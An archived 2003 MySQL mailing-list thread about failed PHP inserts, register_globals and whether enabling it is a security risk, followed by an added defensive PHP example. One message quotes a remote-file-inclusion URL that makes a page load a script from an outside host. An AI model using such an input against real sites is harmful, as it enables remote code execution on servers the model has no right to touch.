Re: Can't insert data from Apache/PHP

2003-06-11 Thread Becoming Digital
> having register_globals 'on' is only a security risk if the code is sloppy.

We're in agreement here, Jay.  I see turning register_globals off as a band-aid
fix for poor coding rather than a rule of thumb.  That 'off' was made the
default only recently emphasizes this, in my opinion.

Edward Dudlik
Becoming Digital
www.becomingdigital.com


-- 
MySQL General Mailing List
For list archives: http://lists.mysql.com/mysql
To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED]



Re: Can't insert data from Apache/PHP

2003-06-11 Thread Curtis Maurand
On Tuesday 10 June 2003 22:49, CM Miller wrote:
>
> globals back to ON.
>
> Sorry, but I am a bit behind on MySQL digest, but
> isn't turning Register Globals 'on' for php a security
> risk?

Yes.  He needs to take a look at the documentation on the PHP website.  I also 
sent instructions on how to make things work by reading the $_POST and $_GET 
and $_SERVER variables.  I also have a couple of code snippets to remove 
other potential offending characters from input.

Curtis




RE: Can't insert data from Apache/PHP

2003-06-11 Thread Jay Blanchard
[snip]
Sorry, but I am a bit behind on MySQL digest, but
isn't turning Register Globals 'on' for php a security
risk? 
[/snip]

We recently had this discussion on the PHP-General list and the upshot
is that having register_globals 'on' is only a security risk if the code
is sloppy. PHP allows this as the variables are not strongly typed and
most developers fail to do any checking of variables to make sure that
they contain what they want them to contain. Turning register_globals
'off' does not take care of that. It just adds another layer of
abstraction to certain variables (such as GET, POST, etc) which is
still vulnerable if the developer does not do a good job of taking care
with his or her variables.

HTH!

Jay
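
Added example, not part of the original thread: the point above about unchecked variables, together with the $_GET/$_POST approach Curtis mentions, shown in PHP. The function names and page names are hypothetical, and extract() stands in for register_globals, which was removed in PHP 5.4.

```php
<?php
// Added illustration, not code from the thread. register_globals was removed
// in PHP 5.4, so extract() imitates it here: request parameters become
// variables unless the script has already set that name.

// Sloppy: $authorized is never initialised, so a request parameter of the
// same name fills it in.
function sloppy_check(array $request, bool $passwordOk): bool
{
    extract($request, EXTR_SKIP);   // stand-in for register_globals = on
    if ($passwordOk) {
        $authorized = true;
    }
    return !empty($authorized);
}

// Careful: the flag is initialised by the script before it is used, which
// holds whether the setting is on or off.
function careful_check(array $request, bool $passwordOk): bool
{
    extract($request, EXTR_SKIP);   // same import as above
    $authorized = false;
    if ($passwordOk) {
        $authorized = true;
    }
    return $authorized;
}

// With the setting off the value still arrives unchecked, now in $_GET.
// The check that matters is on the value: a fixed allow-list of page names.
function resolve_page(array $get): string
{
    $allowed = ['home', 'news', 'contact'];   // hypothetical page names
    $page = $get['page'] ?? 'home';
    if (!is_string($page) || !in_array($page, $allowed, true)) {
        return 'home.php';
    }
    return $page . '.php';
}

// Constructed requests for the demonstration.
$forged = ['authorized' => '1'];
var_dump(sloppy_check($forged, false));    // wrong password, forged flag
var_dump(careful_check($forged, false));   // same request, initialised flag
var_dump(careful_check([], true));         // correct password, no extra input
var_dump(resolve_page(['page' => 'offsite.com/cracked.php']));  // value from the thread's URL
var_dump(resolve_page(['page' => 'news']));
```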




Re: Can't insert data from Apache/PHP

2003-06-10 Thread CM Miller



> I started troubleshooting the code and discovered the problem was the new
> register globals which is defaulted to off in PHP 4.22.  The PHP wasn't
> holding session and wasn't inserting the records into the mySQL database.
> I got it working now by switching the register globals back to ON.

Sorry, but I am a bit behind on MySQL digest, but
isn't turning Register Globals 'on' for php a security
risk? 

Here was an example given at our local php meetup
meeting:


Local index.php:   
Remote cracked.php:  
URL: http://localwebserver.com/index.php?page=offsite.com/cracked.php



=
GTFG

GAIM ID:  cmmiller1973




Re: Can't insert data from Apache/PHP

2003-06-08 Thread ComCity
Oh sorry...my bad.  :)

I started troubleshooting the code and discovered the problem was the new
register globals which is defaulted to off in PHP 4.22.  The PHP wasn't
holding session and wasn't inserting the records into the mySQL database.
I got it working now by switching the register globals back to ON.




Re: Can't insert data from Apache/PHP

2003-06-08 Thread Becoming Digital
So the next step would be to provide us with the code so that we might try to
help you. :)

Edward Dudlik
Becoming Digital
www.becomingdigital.com





Re: Can't insert data from Apache/PHP

2003-06-07 Thread ComCity
Yep...figured that out.

Thank You




Re: Can't insert data from Apache/PHP

2003-06-07 Thread Becoming Digital
That points to a fault in your coding because phpMyAdmin *is* PHP running via
the web server.

Edward Dudlik
Becoming Digital
www.becomingdigital.com





More: Can't insert data from Apache/PHP

2003-06-07 Thread ComCity
It looks like I can insert data through phpMyadmin without issue.  The only
place I can't insert data is through PHP running via the web server.




Can't insert data from Apache/PHP

2003-06-07 Thread ComCity
I've had to reinstall Linux/Apache and mySQL.  The databases are restored,
the data looks to be there, the permissions look to be there.  However, I
can't seem to "INSERT" data into the tables...it's the only thing I can't
do...and I don't see a problem with the permissions.  Don't get any errors
on the webpage but nothing happens.  If I do a select, it works just fine.
I have the database permissions set wide open for troubleshooting.


RWL
owner X XX
group X XX
other  X XX

Owner= mysql
group= mysql

What am I missing?  It's got to be something stupid and something small

Thank You very much.
Michael B.

